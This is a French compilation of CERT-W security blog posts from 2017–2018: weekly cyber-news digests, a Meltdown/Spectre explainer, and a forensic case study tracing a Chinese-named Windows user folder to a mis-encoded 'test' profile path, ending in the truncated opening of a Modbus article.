Une vidéo montre des voleurs anglais en train de voler une Mercedes. Jusque-là rien de nouveau mais lorsque l'on y regarde de plus près, on s'aperçoit que la voiture s'ouvre toute seule ! Pour l'ouvrir et la démarrer, les voleurs ont intercepté le signal RFID de la télécommande en se plaçant près des fenêtres du domicile du propriétaire. Le signal a ensuite été relayé par un boitier situé à proximité du véhicule.

Des cyber-attaquants liés à APT19 ciblent l'Australie

Des attaquants chinois, liés à APT19, auraient attaqué des cabinets d'avocats australiens dans le but d'obtenir des informations commerciales stratégiques. Un département de R&D aurait lui aussi été ciblé. Le porte-parole du "Department of the Prime Minister and Cabinet", qui dirige l'équipe de cyber-crimilnalité, a indiqué que les attaquants avaient peu de chance d'être démasqués. Aucune autre information n'a été apportée sur la sensibilité des données dérobées.

Un cryptomineur caché sous la barre des tâches de Windows

Nous l'évoquions dans une précédente brève, les mineurs de cryptomonnaie ont le vent en poupe sur les navigateurs Web. Pour continuer à miner même lorsque l'utilisateur ferme l'onglet ou la fenêtre de la page, une fenêtre contenant le mineur est cachée sous la barre des tâches Windows. Il n'est donc pas possible pour un utilisateur néophyte de voir que le cryptomineur continue son oeuvre. Pour identifier la fenêtre, il suffit d'agrandir puis de réduire la taille de la barre des tâches.

Veille vulnérabilité

Absence de mot de passe root sur macOS

Dans un tweet du 28 novembre, Lemi Ergin a dévoilé un bug sur la fenêtre d'élévation de privilèges de MacOS High Sierra. En effet, il est possible de valider le mot de passe du compte root... sans entrer de mot de passe ! Cette vulnérabilité cible uniquement la dernière version du système d'exploitation d'Apple. Une mise à jour a été publiée des utilisateurs 18 heures après la découverte du bug. Néanmoins, des utilisateurs ont indiqué à WIRED que malgré le correctif, la faille est toujours présente dans certaines conditions. Apple a répondu qu'il convient de redémarrer le poste une fois la mise à jour appliquée.

Indicateurs de la semaine

Le leak de la semaine - Des données accessibles en masse sur des buckets S3

Des données sensibles, d'une agence de renseignement américaine (INSCOM), ont été découvertes sur un serveur de stockage Amazon (AWS S3). Parmi les documents accessibles, le disque d'une machine virtuelle "Oracle Virtuel Appliance" contient des fichiers classés "Top Secret" ainsi que des clés de chiffrement.

Le leak de la semaine - Plus de 100Go de données bancaires fuitées

Un serveur AWS S3 mal configuré est de nouveau la cause de l'exposition de plusieurs gigaoctet de données personnelles sur le web. Il s'agissait de données de la National Credit Federation, composées des noms, adresses, dates de naissance, permis de conduire, numéros de sécurité sociale et informations bancaires de plus 40 000 consommateurs.

L'attaque de la semaine - Une vulnérabilité sur Facebook permettait de supprimer les photos de n'importe quel utilisateur

Pouya Darabi, chercheur Iranien, a découvert une faille de sécurité, facilement exploitable permettant de supprimer une image du réseau social Facebook. Pour cela, le chercheur crée un nouveau sondage. Au moment d'y ajouter une image, il modifie la requête pour sélectionner une image postée par quelqu'un d'autre Une fois le sondage en ligne, il le supprime, ce qui a pour conséquence de supprimer aussi l'image qu'il a utilisée. Facebook, par le biais, de son programme de Bug Bounty a récompensé le chercheur d'une prime de 10 000$.

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.126
Adobe Acrobat Reader DC
2018.009.20044
Java
Version 8 Update 151
Mozilla Firefox
57.0.2
Google Chrome
62.0.3202.97
VirtualBox
5.2.2
CCleaner
5.38.6357

Vincent DEPERIERS

CERT-W : Retours sur l'actualité de la semaine du 11 au 17 décembre 2017

December 26, 2017, 2:32 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Toute l'équipe du CERT-W se joint également à moi pour vous souhaiter de bonnes fêtes de fin d'année !

Veille cybercriminalité

Les données des 18 millions d'électeurs de l'Etat de Californie volées et sujettes à une rançon

Une base de données MongoDB de l'administration californienne, mal configurée et exposée sur Internet, a été victime d'une attaque visant à télécharger les données présentes sur base avant de les supprimer. Les attaquants ont laissé à la place une demande de rançon sous la forme d'un enregistrement de base de données, et ont demandé 0,2 BTC (soit $2,325.01 au moment des faits).
Les noms, prénoms, emails, adresses, numéros de téléphone, lieux de naissance, etc. figuraient à la liste des données volées.

Un outil de sécurité pour détecter les fuites de données

Il fallait y penser. La société Tripwire a mis au point un système très simple de détection de fuites de données utilisateurs sur n'importe quel site Internet.
Des comptes "honeypot" sont créés de manière automatique sur un grand nombre de sites Internet, et sont chacun rattachés à un adresse email, hébergée chez un grand fournisseur de mails.
Lors d'une fuite données sur un site quelconque, les attaquants récupèrent les hashes des mots de passe des comptes compromis, cassent les mots de passe les plus faibles, et tentent de réutiliser ces mots de passe sur plusieurs services, notamment sur fournisseur de mail rattaché au compte compromis. La connexion au compte mail déclenche une alerte, et permet à la société Tripwire de détecter la fuite de données.

Avast rend son décompilateur "RetDec" Open Source

Le décompilateur en ligne le plus utilisé (le seul ?) dans le monde, retdec.com, a vu ses sources publiées par Avast sur GitHub le 12 décembre dernier.
L'outil permet, à partir d'un binaire exécutable, d'obtenir une approximation du code source original.
Bien qu'il soit limité à la décompilation de binaires 32 bits, RetDec reste adapté à l'analyse de malwares (rarement en 64 bits pour des raisons de compatibilité) et supporte plusieurs plateformes (x86, ARM, MIPS, etc.).

Veille vulnerabilité

A quand la cryptographie souveraine ?

Eric Filiol, directeur de recherche à ESIEA, et son collègue Arnaud Bannier, ont présenté lors de la Black Hat Europe dernière une conférence sur les portes dérobées mathématiques sur les algorithmes de chiffrement.
Lors de leurs recherches, ces deux experts en cryptographie ont pu concevoir un algorithme de chiffrement par blocs capable de passer les tests statistiques et cryptographiques du NIST et de la NSA, considérés comme étant une validation reconnue dans le monde de la cryptographie.
Cependant, l'algorithme qu'ils ont conçu contient une porte dérobée mathématique, qui leur permet de retrouver la clé de chiffrement utilisée à partir de 300Ko de données chiffrées et des textes clairs correspondants.
Cette recherche prouve donc par la pratique qu'il est possible de créer un algorithme "backdooré", ce qui pourrait remettre en cause la robustesse notoire de standards d'aujourd'hui tels qu'AES.

Le "Patch Tuesday" de décembre est sorti

34 vulnérabilités ont été corrigées dans le dernier lot de correctifs Microsoft. Parmi ces failles, beaucoup concernent des problématiques d'exécution de code à distance : deux dans le "Malware Protection Engine", une dans Internet Explorer, une dans Excel.
La vulnérabilité CVE-2017-11927, semble également intéressante, puisse qu'elle permet à un attaquant de récupérer le hash NTLM d'un utilisateur à distance en exploitant une vulnérabilité dans la façon dont Windows traite les lien "its://".

Une vulnérabilité critique exploitable à distance trouvée dans le gestionnaire de mots de passe "Keeper"

Depuis la version 1607 de Windows 10 (Anniversary Update), celui-ci présente une fonctionnalité nommée "Content Delivery Manager", qui s'autorise à installer silencieusement des logiciels tiers sur votre poste, dès lors qu'il font partie des suggestions Windows Spotlight.
Parmi ces logiciels, le gestionnaire de mots de passe Keeper, dont une vulnérabilité critique a été trouvée par Tavis Ormandy (Google).
Cette vulnérabilité permet à un attaquant de voler silencieusement les mots de passe stockés sur gestionnaire de sa victime, si celle-ci navigue sur un site malveillant en ayant le logiciel lancé. Un site "proof-of-concept" exploitant la vulnérabilité a été publiée (voir sources).

(pour désactiver le "Content Delivery Manager" sur vos postes personnels, voir les sources ci-dessous)

Indicateurs de la semaine

L'attaque de la semaine - Une vulnérabilité importante trouvée dans des implémentations de SSL/TLS affecte 27 sites du top 100 mondial

Une vulnérabilité présente dans différentes implémentations du protocole SSL/TLS a été publiée la semaine dernière. L'attaque ROBOT est basée sur une attaque datant de 1998 (l'oracle de Bleichenbacher), dont les contre-mesures complexe auraient été parfois mal implémentées.
La faille concerne les serveurs SSL/TLS supportant l'algorithme RSA pour l'échange des clés de session. Un attaquant en écoute passive interceptant un échange chiffré par ce biais est en mesure de le déchiffrer, en échangeant des messages spécialement conçus avec le serveur affecté. La vulnérabilité permet également de signer un message arbitraire à l'aide de la clé privé du serveur sans y avoir accès.

Cette vulnérabilité affectait 27 sites du top 100 mondial, parmi lesquels PayPal et Facebook. La bibliothèque cryptographique BouncyCastle était également affectée par cette vulnérabilité.

Le leak de la semaine - 1,4 milliards de mots de passe fuités dans une base de données

Une archive regroupant de plus de 40 Go, comprenant 1,4 milliards de mots de passe en clair, a été publiée sur le darknet. L'auteur du dump en question est inconnu mais celui-ci a laissé une adresse Bitcoin et DogeCoin afin de recevoir des dons.

L'exploit de la semaine - L'auteur de BrickerBot prend sa retraite et lègue son code

Le hacker connu sous le nom de janit0r, auteur du "projet" BrickerBot, a annoncé dans un manifeste publié la semaine dernière qu'il mettait fin à ses opérations. Les actions qu'il menait visaient à rechercher des périphériques IoT ou routeurs directement exposés sur Internet, et affectés par des vulnérabilités connues ou disposant d'authentifiants par défaut. Ces périphériques pouvant être piratés facilement, le but de janit0r était de les rendre hors d'usage ("bricked"), afin qu'ils ne puissent pas être infectés par des botnets tels que Mirai et contribuer à des attaques DDoS.
Le hacker a également publié le code source (très obfusqué) de ces attaques, compilant une grande quantité d'exploit, dont un exploitant une 0day sur un produit Huawei.

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.126
Adobe Acrobat Reader DC
2018.009.20044
Java
Version 8 Update 151
Mozilla Firefox
57.0.2
Google Chrome
63.0.3239.108
VirtualBox
5.2.4
CCleaner
5.38.6357


Maxime MEIGNAN
Search

CERT-W : Retours sur l'actualité de la semaine du 25 au 31 décembre 2017

January 5, 2018, 3:00 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus de la semaine par Jean MARSAULT, un premier point sur les attaques Meltdown et Spectre.

Veille cybercriminalité

L'exploit utilisé par les malwares Satori et BrickerBot rendu public

La vulnérabilité CVE-2017-17215 affectant les routeurs Huawei a été utilisé en cette fin d'année par le botnet IOT nommés Satori et BrickerBot. Le code utilisé par ces malwares a maintenant été rendu public, rendant accessible l'exploitation de la vulnérabilité à tous.
Pour rappel, Huawei a publié les mesures de sécurité à appliquer pour se protéger de cette vulnérabilité, notamment la configuration du pare-feu et le changement du mot de passe par défaut.

La compagnie Forever 21 confirme l'incident de sécurité affectant ses systèmes de paiement

Suite à son annonce de Novembre indiquant un incident de sécurité, la compagnie Forever 21 a confirmé la présence d'un malware dans certains de ces points de ventes. Le malware aurait permis aux attaquants le vol de cartes bancaires entre Avril et Novembre 2017.

Veille vulnerabilite

Les serveurs Web GoAhead affectés par une vulnérabilité permettant l'exécution de code malveillant à distance

Des chercheurs d'Elttam ont découvert une vulnérabilité dans la solution de serveur Web de GoAhead utilisé dans de nombreux équipements connectés. La vulnérabilité, nommée CVE-2017-17562, pourrait permettre l'exécution de code à distance sur toutes les versions des serveurs Web GoAhead inférieures à la 3.6.5. Une recherche sur Shodan révèle alors plus de 700 000 équipements vulnérables.

Une vulnérabilité affectant les enceintes Sonos et Bose pourrait permettre leur contrôle

Des experts de chez Trend Micro ont démontrés que certains modèles d'enceintes Sonos et Bose sont affectés par une vulnérabilité pouvant permettre à un attaquant de jouer des sons choisis. Une preuve de concept réalisée par les chercheurs est l'envoi de commandes à Alexa, l'assistant vocal de l'Amazon Echo.

Des distributeurs russes attaqués en pressant 5 fois la touche SHIFT

Les distributeurs de la banque russe Sberbank, qui utilisent toujours le système d'exploitation Windows XP, sont affectés par une vulnérabilité particulièrement simple à exploiter. En effet, le simple fait de presser 5 fois une touche telle que SHIFT, CTRL ou ALT permet d'accéder aux paramètres Windows et ainsi au système Windows XP.

Thunderbird affecté par une vulnérabilité critique

Mozilla a publié cinq mises à jour de sécurité dont une corrigeant une vulnérabilité critique affectant le logiciel de messagerie Thunderbird. Cette vulnérabilité, nommée CVE-2017-7845 est un buffer overflow affectant les versions du logiciel tournant sur le système d'exploitation Windows.

Indicateurs de la semaine

Le leak de la semaine - Les données de 300 000 comptes du service Ancestry.com ont été exposées

Ancestry.com est un service de construction d'arbre généalogique qui dispose de plusieurs millions d'utilisateurs. En fin d'année 2017, le chercheur Troy Hunt a notifié Ancestry.com d'un fichier non sécurisé sur un serveur RootsWeb (service associé à Ancestry) exposant les adresses mail, noms d'utilisateurs et mots de passe de plus de 300 000 utilisateurs.
Les équipes de sécurité d'Ancestry ont alors immédiatement démarré les investigations pour déterminer l'impact de cette faille, et les actions à mettre en place. Une très bonne gestion de crise qui a permis de traiter l'incident rapidement et sans embuches.

L'exploit de la semaine - CVE-2017-17692

Le navigateur Web installé par défaut sur les téléphones Samsung Android est affecté par une vulnérabilité critique rendue publique permettant la récupération d'informations en cas de visite d'un site contrôlé par un attaquant.
Un module metasploit a été rendu publique pour cette vulnérabilité de type Same Origin Policy.

L'attaque de la semaine - La cyber-sécurité dans Star Wars

Une vidéo décrivant les nombreuses failles de sécurité de la fédération dans le premier film Star Wars a été réalisée.

Sources :

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.126
Adobe Acrobat Reader DC
2018.009.20044
Java
Version 8 Update 151
Mozilla Firefox
57.0.4
Google Chrome
63.0.3239.108
VirtualBox
5.2.4
CCleaner
5.38.6357

Nicolas DAUBRESSE

MELTDOWN & SPECTRE : attaques par canaux cachés sur les processeurs

January 5, 2018, 6:09 am
$
0
0

Le début d’année 2018 semble être une période difficile pour les constructeurs de processeurs puisque pas moins de 3 vulnérabilités critiques viennent d’être publiées à l’encontre des processeurs de différentes marques (Intel, ARM, AMD). Ces vulnérabilités concernent des attaques par canaux auxiliaires qui permettent entre autres de lire arbitrairement la mémoire du noyau depuis une application non privilégiée, voire la mémoire de l’hyperviseur (et par conséquent des autres machines virtuelles qu’il héberge). 

Suis-je affecté ?

C’est extrêmement probable.


Attaques par canaux auxiliaires?

Les attaques par canaux auxiliaires désignent un ensemble d’attaques qui ne ciblent pas un algorithme dans sa conception mais dans son implémentation. Plusieurs catégories d’attaques par canaux auxiliaires existent, dont :
  • Attaque temporelle
  • Attaque par consommation
  • Attaque par injection de fautes
  • etc.


MELTDOWN & SPECTRE

Les vulnérabilités MELTDOWN (CVE-2017-5754) et SPECTRE (CVE-2017-5715 et CVE-2017-5753) reposent sur une attaque temporelle ciblant les temps d’accès aux informations présentes dans le cache du processeur.
Plus précisément, au sein d’un système d’exploitation, les informations contenues en mémoire sont divisées en deux catégories :
  • Les informations relatives aux applications utilisateur, accessibles par le noyau et (sous certaines conditions) à ces mêmes applications ;
  • Les informations privilégiées, relatives au noyau, uniquement accessibles par le noyau.


Les tentatives d’accès aux portions relatives aux noyaux par une application utilisateur sont par conséquent systématiquement bloquées, et il n’est donc pas possible de récupérer la valeurs contenues à ces adresses mémoires … directement. 
Ces vulnérabilités reposent sur le fait que les processeurs vulnérables utilisent le principe d’exécution spéculative afin d’optimiser les performances de ce dernier. L’exécution spéculative  détermine en amont de l’exécution normale si les instructions à exécuter sont réellement nécessaires et comment elles pourraient être accélérées. Bien que rien ne soit réellement exécuté, des restes de cette analyse sont présents dans le cache du processeur, et peu conduire un utilisateur malveillant à extraire les informations contenues en mémoire noyau, sans pour autant y accéder directement.

Des whitepapers sont disponibles pour MELTDOWN et SPECTRE.

Quels impacts ?

La vulnérabilité MELTDOWN permet l’accès à l’ensemble de la mémoire du système d’exploitation par les applications utilisateur. Sous Windows, il serait donc possible de récupérer des informations sensibles, tels que les jetons d’accès de processus, qui peuvent par la suite permettre l’usurpation de privilèges. MELTDOWN ne cible que les processeurs Intel
La vulnérabilité SPECTRE permet d’accéder à la mémoire des autres applications du système et par conséquent à un ensemble d’informations liées à ces programmes : mots de passe, saisies utilisateur, etc. Cette vulnérabilité bas niveau peut être exploitée par des applications haut niveau, un PoC ayant été réalisé en JavaScript. La vulnérabilité cible les processeurs Intel, ARM et AMD.
Ces vulnérabilités sont également exploitables dans le cas de systèmes virtualisés (hyperviseurs et conteneurs), notamment dans le cas de Docker et de Xen PV.

Que faire ?

La vulnérabilité MELTDOWN peut être corrigée par application d’une mise à jour appelée « KTPI » ou « KAISER ». Cette mise à jour rend inaccessible la mémoire noyau pour les applications utilisateur, prévenant leur accès par la vulnérabilité. Cette mise à jour est d’ores et déjà disponible pour Linux (version 4.14.11), partiellement pour Mac OS 10.13.2 (puis complètement en version 10.13.3, et pour Windows (version 17035). Il est cependant important de noter que la mise à jour Windows ne peut être déployée si un logiciel antivirus non compatible est installé, la liste de ceux qui le sont étant disponible et tenue à jour ici.
La correction de la vulnérabilité SPECTRE nécessite en théorie un changement du matériel, ou a minima une mise à jour de son firmware. Cela n’étant pas réalisable de manière simple, des solutions palliatives sont aujourd’hui envisagées, au cas par cas. La vulnérabilité étant particulièrement critique dans le cas des navigateurs (puisqu’exploitable par du code JavaScript), des communiqués ont été rapidement publiés sur par Google et Mozilla ce sujet afin de proposer des solutions court terme.

Concrètement

La majorité du matériel grand public et de celui présent en entreprise est impactée par ces vulnérabilités. Il est donc recommandé de mettre dès que possible à jour les applicatifs et systèmes d’exploitation impactés par MELTDOWN, ainsi que de se renseigner sur les évolutions liées à la mitigation de la vulnérabilité SPECTRE.
Notamment, dans le cadre d’applications et d’infrastructures hébergées en SaaS/IaaS, il est conseillé de se rapprocher des fournisseurs de services d’hébergement pour connaître leur politique de mise à jour sur ce sujet et les dates de redémarrage des infrastructures d’hébergement. Certains communiqués sont déjà disponibles, par exemple Amazon AWS, Azure, OVH et Online.net.



Jean MARSAULT

CERT-W : Retours sur l'actualité de la semaine du 8 au 14 janvier

January 25, 2018, 7:20 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus de la semaine par François LELIEVRE, un retour d'expérience CERT sur un cas ... particulier.

Veille cybercriminalite

Une présentation du format de stockage Expert Witness Format (EWF) de la société EnCase spécialisée en analyse inforensique

Sources :

Une loi obligeant la notification des fuite de données pour les entreprises va rentrer en vigueur en Australie au mois de février 2018

Sources :

Un attaque ciblée déployant un malware bancaire tire partie du format de fichier d'aide Windows CHM

Sources :

Le point sur les attaques visant à scanner les cartes bancaires ou passeports équipés de technologies sans-contact

Sources :

Des gagnants d'un quizz de sensibilisation à la cybersécurité récompensés avec une clé USB piégée par un malware

Sources :

Veille vulnerabilite

DuoSecurity effectue un rappel sur la sécurité du Bluetooth

Sources :

L'ANSSI publie la seconde version du référentiel pour les prestataires de détection des incidents de sécurité (PDIS)

Sources :

Récupérer le hash NetNTLM d'un utilisateur Windows en injectant un chemin UNC dans un document Word

Sources :

La société NetSPI publie un wiki sur les injections SQL

Sources :

4 techniques de contournement de l'épinglement de certificat pour Android

Sources :

Des vulnérabilités au niveau matériel découvertes pour la tablette VTech Innotab Max destinée aux enfants

Sources :

La société PentestPartners découvre une faille permettant de contourner la protection contre la lecture du microcode sur le composant NRF51822

Sources :

Cisco Talos publie une analyse des activités d'un groupe cybercriminel visant principalement la Corée du Sud

Sources :

Moins de 10% des utilisateurs de Gmail utilisent le mécanisme de double authentification

Sources :

Un chercheur découvre un couple d'authentifiants inscrit en dur au sein des NAS Western Digital MyCloud

Sources :

Skype expérimente le chiffrement de bout-en-bout des conversations audio et texte au moyen du protocole Signal

Sources :

Le consortium Wi-Fi Alliance normalisant la technologie Wi-Fi annonce la version 3 du protocole WPA

Sources :

Comment attaquer un contrôleur de domaine en lecture seule (RODC) d'une infrastructure Active Directory

Sources :

Comment sécuriser le composant de fédération ADFS dans une infrastructure Active Directory

Sources :

Comment tester les formulaires Web multi-étapes

Sources :

Un chercheur publie des vulnérabilités permettant de désactiver des solution antivirales

Sources :

De multiples vulnérabilités découvertes au sein de la pompe à perfusion Smiths Medical Medfusion 4000

Sources :

Indicateurs de la semaine

L'attaque de la semaine - De multiples vulnérabilités découvertes au sein de la pompe à perfusion Smiths Medical Medfusion 4000

Sources :

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.137
Adobe Acrobat Reader DC
2018.009.20044
Java
Version 8 Update 161
Mozilla Firefox
58.0
Google Chrome
64.0.3282.119
VirtualBox
5.2.6
CCleaner
5.39.6399


Thomas DEBIZE

#REX : Houston, we’ve got a chinese account on our system

January 25, 2018, 7:20 am
$
0
0





Le CERT-W a été contacté afin d’investiguer sur l’origine d’un dossier utilisateur chinois sur un système Windows :


Présence d’un dossier chinois au sein du dossier « C:\Users »

L’origine de la création de dossier utilisateur au sein du dossier « C:\Users » est engendrée à la suite de la première authentification d’un utilisateur, et non lors de sa création. 


Analyse de la génération d’un dossier utilisateur « test »

Ainsi, la présence de ce dossier révèle que l’utilisateur nommé « 整瑳 » s’est authentifié sur la machine analysée.
La création d’un utilisateur au sein d’un système Windows est enregistrée au sein du fichier journal « Security » sous l’identifiant « 4720 – Un compte d’utilisateur a été créé ».


Exemple d’évènement généré lors de la création d’un utilisateur sur une ressource Windows

Lors des investigations conduites, l’étude du fichier journal « Security » sur la ressource analysée n’a cependant révéler aucune information concernant la création du compte utilisateur « 整瑳». 
En effet, une taille maximale est attribuée aux journaux Windows ; une rotation est ainsi appliquée en cas de dépassement (les anciens journaux sont donc écrasés au fur et à mesure de façon automatique). Le journal « Security » étant très sollicité, il semble donc légitime que l’événement ne soit plus présent.

Néanmoins, l’étude du journal système « Microsoft-Windows-User Profile Operational » a révélé que la ruche utilisateur« NTUSER.DAT » présente au sein du dossier de l’utilisateur « C:\Users\整瑳\ » est chargée en mémoire à intervalles réguliers sur la ressource analysée : l’utilisateur se connecte donc régulièrement sur le système.


Analyse des journaux Microsoft-Windows-User Profile Operational 

Par ailleurs, cet évènement révèle le SID Security IDentifier ») associé à l’utilisateur « 整瑳 » : 
  • S-1-5-21-2165619761-3865691470-1251770841-1001

L’analyse de la base SAM du système révèle que cet SID est associé à l’utilisateur nommé « test ». Par ailleurs, aucun utilisateur nommé « 整瑳 » ne semble être configuré sur le système :


Extrait de la base SAM 

Or, la documentation Microsoft décrit le fonctionnement suivant concernant l’attribution des SID sur une ressource Windows :
« For every local account and group, the SID is unique for the computer where it was created; no two accounts or groups on the computer ever share the same SID» (https://technet.microsoft.com/en-us/library/cc778824(v=ws.10).aspx)
Ces différentes informations laissent donc présager que les utilisateurs « test » et « 整瑳 » sont donc un unique utilisateur.
L’analyse du registre dévoile que le chemin de profil associé à l’utilisateur disposant du SID précédemment identifié est le dossier « C:\Users\整瑳 » :


Données de la valeur « ProfileImagePath »

Le compte utilisateur nommé « test » dispose donc du dossier « C:\Users\整瑳 » pour dossier personnel.
L’analyse de la valeur binaire de la clé « ProfileImagePath » révèle la présence de la chaîne de caractères « test ». Cependant, cette dernière dévoile que les caractères « test » n’ont pas correctement été encodée en unicode (selon lequel un caractère est défini sur deux octets).
Ainsi, les octets « te » et « st » représentent les deux caractères en unicode : 整瑳.


Mauvais encodage de la chaîne de caractères « test » au sein de la valeur « ProfileImagePath »

En effet, cette valeur devrait être définie à « .t.e.s.t.. » (soit « 00 74 00 65 00 73 00 74 00 00») pour que la chaîne de caractères « test » soit correctement affichée par le système :


Correction de la valeur « ProfileImagePath » en unicode

Ainsi, cela confirme que : 
  • L’utilisateur « 整瑳 » et « test » sont un seul et même utilisateur ;
  • Le dossier « C:\Users\整瑳 » est le dossier personnel de l’utilisateur « test ».


À la suite d’un entretien avec les personnes en charge de l’administration de la ressource analysée, les investigateurs ont été informés que le compte « test » est exploité en tant que compte de service par un logiciel tiers. 
Ainsi, il est fort probable qu’une erreur d’implémentation au sein de la fonction générant le dossier personnel du compte de service créé lors de l’installation de ce logiciel soit à l’origine de ce bogue.
En effet, la timeline des évènements systèmes s’étant produits sur la ressource, générée à l’aide de l’outil plaso, a permis d’illustrer que l’enregistrement dans la base SAM du compte « test » et la création du dossier utilisateur « C:\Users\整瑳 » étaient liés : ces deux évènements se sont produits simultanément. Néanmoins, aucune trace de l’installation du logiciel en question n’a pu être récupérée.

Enfin, il a été possible de reproduire ce bogue en modifiant légèrement le code source disponible via le lien suivant : https://support.microsoft.com/en-us/help/196070/how-to-programmatically-cause-the-creation-of-a-user-s-profile.
En effet, un comportement similaire (création d’un utilisateur disposant d’un dossier non encodé au format unicode) a pu être obtenu en remplaçant l’appel à la fonction LoadUserProfileA() par la fonction LoadUserProfileW() :


Extrait de la documentation de la fonction LoadUserProfile

Ainsi, il est très probable qu’une erreur d’implémentation se soit glissée au sein du logiciel tiers déployé sur la ressource analysée. 
En effet, une erreur lors de l’appel à la fonction LoadUserProfile a été réalisée : la fonction LoadUserProfileW a été appelée au détriment de la fonction LoadUserProfileA. Or, le programme devait probablement manipuler des chaînes de caractères ANSI, générant ainsi une erreur d’encodage lors de la création du dossier utilisateur associé au compte de service configuré par le logiciel.


Conclusion

La présence d’un dossier chinois sur un système n’induit pas forcément la compromission de ce dernier ; néanmoins, des investigations doivent systématiquement être conduites. En effet, cette dernière peut être liée à la mauvaise implémentation d’un logiciel déployé sur le système.
Par ailleurs, une attention particulière doit être portée lors de l’utilisation de fonctions sensibles à l’encodage, afin d’éviter l’introduction de bogues et potentiels effets de bord lors de l’exécution de tels programmes. De tels comportements peuvent être évités en exploitant les dernières fonctions offertes par les API Windows ; notamment, la fonction CreateUserProfile peut être employée pour créer des profils utilisateurs sur les systèmes Windows supérieur à Windows Vista. Cette dernière ne diffère pas selon l’encodage souhaitée (ANSI ou unicode).
Enfin, il convient de centraliser les journaux systèmes en temps réel vers une ressource dédiée, et d’externaliser par la suite ces derniers afin d’éviter toute perte d’enregistrements ; facilitant ainsi les investigations en cas d’incident.


François LELIEVRE

CERT-W : Retours sur l'actualité de la semaine du 29 janvier au 4 février 2018

February 9, 2018, 3:43 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus de la semaine par Arnaud Soullié, Fun with Modbus 0X5A.

Veille cybercriminalite

Nouvelle disparition massive de cryptomonnaie

Le système de cryptomonnaie NEM, plus largement utilisé au Japon, a vu sa popularité bondir au cotés du bitcoin, la valeur 1NEM passant de $0.00004 à 1$.
Une plateforme d'échange populaire au Japon vient cependant d'annoncer la "perte" de près de 500 millions de dollars de cette monnaie, appartenant à quelques 260 000 particuliers, ce qui ferait de ce vol présumé l'un des plus importants vols de cryptomonnaie.
La compagnie prétend rembourser leurs pertes aux usagers.

Nouveaux cryptomining virus

La menace de cryptomining malwares se précise pour les entreprises, alors que la tendances pour les cryptomonnaies n'a jamais été aussi médiatisée. Les ressources nécessaires au minage de cryptomonnaie sont conséquentes, et l'option la plus simple pour les pirates est donc d'utiliser l'électricité et la puissance des infrastructures d'entreprises.
De nombreux malwares sont désormais couplés à des exploits connus (cf WannaMINE), afin de s'introduire dans les réseaux d'entreprise.
Les entreprises ne sont pas les seules touchées, puisque de nombreux cryptominers se cachent également dans les applications Android ou les pages javascript.

Beware ! Spectre and Meltdown malwares are coming

Pus de 130 codes malveillants exploitant les failles Spectre et Meltdown ont été repérés par les chercheurs d'AV-TEST, de différentes sources (antivirus, online testers et chercheurs). En grande partie basés sur le PoC Javascript sorti début janvier, ces virus en devenir en sont apparemment encore au stade de R&D.
Des attaques massives sont donc à craindre prochainement, alors qu'aucun patch fonctionnel n'est disponible.

Veille vulnerabilite

Une vulnérabilité (de plus) 0-day sur Flash

Une équipe de chercheurs coréens (KrCERT) ont publié ce 31 janvier un document décrivant l'existance d'une vulnérabilité 0-day touchant Adobe Flash, utilisée par des attaquant (nord-coréens d'après eux), et qui permettrait l'exécution de code.
Le malware, embarqué dans un fichier SWJ caché au sein d'un document Excel, lance ensuite la récupération d'autres malware d'espionnage et vise principalement des Sud-Coréens travaillant pour l'armée, la défense, ou la recherche.
La vulnérabilité, appelée CVE-2018-4878, a également fait l'objet d'un communiqué par Adobe, qui a sorti un patch le 05/02/18.

Le scanner d'empreintes Lenovo victime d'une vulnérabilité critique

Les ordinateurs d'entreprise (ThinkPad, ThinkCentre, et ThinkStation) vendus par Lenovo utilisent le logiciel FingerPrint Manager Pro afin de permettre aux utilisateurs de s'authentifier, sur Windows notamment. Une vulnérabilité importante a été identifiée au sein de celui-ci : il est possible non seulement de récuperer des informations sensibles (tels que les authentifiants Windows), mais également de les déchiffrer (le logiciel utilisant un algorithme de chiffrement faible) et de contourner complètement l'authentification grâce à un mot de passe hardcodé.
La vulnérabilité (CVE-2017-3762) est patchée dans les versions 8.01.87. La faille touchant des dizaines de modèles du constructeur, il est recommandée de s'assurer de disposer d'une version à jour de ce logiciel.

Un plug-in Burp pour exploiter les vulnérabilités Wordpress


Indicateurs de la semaine

L'attaque de la semaine - Une startup se volatilise avec pour seul indice le mot "penis"

Dérobant la somme ridicule de 11$ en Ethereum à ses investisseurs, la startup Prodeum a disparu des radars, laissant pour seul indice son site internet défacé, affichant le mot "penis". La startup avait pour projet de "révolutionner le monde des fruits et légumes en les intégrant dans la blockchain"...

L'exploit de la semaine - Un outil pour rechercher des cibles vulnérables et lancer des attaques automatisées

Assez controversé, un nouvel outil est apparu, permettant de repérer des cibles vulnérables et lancer des attaques massives. Ajoutant les capacités de l'outil de recherche Shodan aux fonctionnalités d'attaque de Metasploit, Autosploit met à la portée de n'importe qui l'attaque massive en ligne.

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.161
Adobe Acrobat Reader DC
2018.009.20044
Java
Version 8 Update 161
Mozilla Firefox
58.0.2
Google Chrome
64.0.3282.140
VirtualBox
5.2.6
CCleaner
5.39.6399

Camille MARSIGNY

Fun with Modbus 0x5A

February 9, 2018, 3:43 am
$
0
0

Lors de la dernière édition de la DEFCON, nous avons présenté nos travaux de R&D concernant un protocole propriétaire Schneider à l’ICS Village, espace dédié à la sécurité des SI industriels.
Vous pouvez retrouver notre intervention en vidéo : https://www.youtube.com/watch?v=A_B69Rifu1g

Revenons sur ces travaux et la manière dont ils peuvent être exploités.


Le protocole Modbus

